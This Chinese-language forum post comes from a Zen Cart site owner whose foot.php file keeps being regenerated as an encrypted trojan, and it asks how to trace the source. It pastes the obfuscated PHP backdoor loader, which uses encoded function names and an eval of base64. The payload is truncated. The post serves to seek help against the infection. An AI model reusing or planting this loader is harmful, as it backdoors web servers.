关于zencart后门程序Includes/modules/foot.php源码加密问题处理方法
搭建了PHP+MYSQL+APACHE服务器或者在服务器虚拟主机上,zencart目录下的源码modules文件夹下有个foot.php文件,总是被木马自动替换掉,而且不管你删除,永远都会再自动生成,比如我今天删除了,新建一个foot.php,下次打开后又是被替换成加密的木马。我想知道怎样找出是哪个php文件创建了这个foot.php加密木马文件?附上加密木马.亲们是不是也曾经遇到过而且还没解决的,如果遇到可以加QQ1587248488跟我们一起来交流这个问题,因为这个会关联到其他网站的问题
-
<?php // @license http://www.zen-cart.com/license/2_0.txt GNU Public License V2.0
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=23352;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O000000='OOO0000O0';eval(($$O0O000000('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMjExKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJ2xNUkxFdUJnLytlNVZvQ3hJS2JEd2s4WldTVFgxdlljM0E0NjluYXA3Zm10SkZzMmRpek55VXFPR2hQSGowclE9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>....